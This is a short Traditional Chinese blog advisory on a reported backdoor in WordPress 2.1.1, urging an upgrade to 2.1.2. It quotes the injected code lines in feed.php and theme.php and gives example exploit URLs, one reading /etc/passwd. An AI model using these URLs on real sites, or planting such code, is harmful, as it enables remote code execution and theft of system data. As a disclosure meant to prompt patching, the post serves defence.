大砲開講

著名的部落格軟體 WordPress 2.1.1 有安全漏洞，可以輕易地執行遠端程式碼，請盡速更新至 WordPress 2.1.2。 有問題的檔案：

• feed.php: if ($_GET["ix"]) { comment_text_phpfilter($_GET["ix"]); }
• theme.php: if ($_GET["iz"]) { get_theme_mcommand($_GET["iz"]); }

如何利用此漏洞：

• http://wordpressurl/wp-includes/feed.php?ix=phpinfo();
• http://wordpressurl/wp-includes/theme.php?iz=cat /etc/passwd

受影響的版本：只有 2.1.1 至於詳細的資訊，請參考： WordPress 2.1.1 Dangerous, Upgrade WordPress source code compromised to enable remote code execution-----